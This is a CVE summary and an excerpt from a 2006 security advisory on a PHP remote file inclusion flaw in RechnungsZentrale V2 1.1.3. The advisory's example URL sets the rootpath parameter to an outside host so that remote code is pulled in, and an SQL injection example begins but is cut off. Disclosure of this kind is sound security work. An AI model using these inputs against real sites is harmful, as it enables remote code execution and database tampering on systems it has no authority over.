CVE-2006-1955

The CVE-2006-1955 entry concerns RechnungsZentrale V2 (Nicolas Fischer/NFec) with versions 1.1.3 and earlier affected by a PHP remote file inclusion via the rootpath parameter in authent.php4, enabling possible arbitrary PHP code execution. Affected component: authent.php4; root cause: insecure h...

RechnungsZentrale V2 < 1.1.3 - Remote File Inclusion

GroundZero Security Research and Software Development 2006 - Software: RechnungsZentrale V2 Version: 1.1.3, likely older versions are affected aswell. Vendor: http://www.nfec.de/ Remote Inclusion: http://www.victim.tld/mod/authent.php4?rootpath=Http://server.tld/mod/db.php4 SQL Injection: User: '...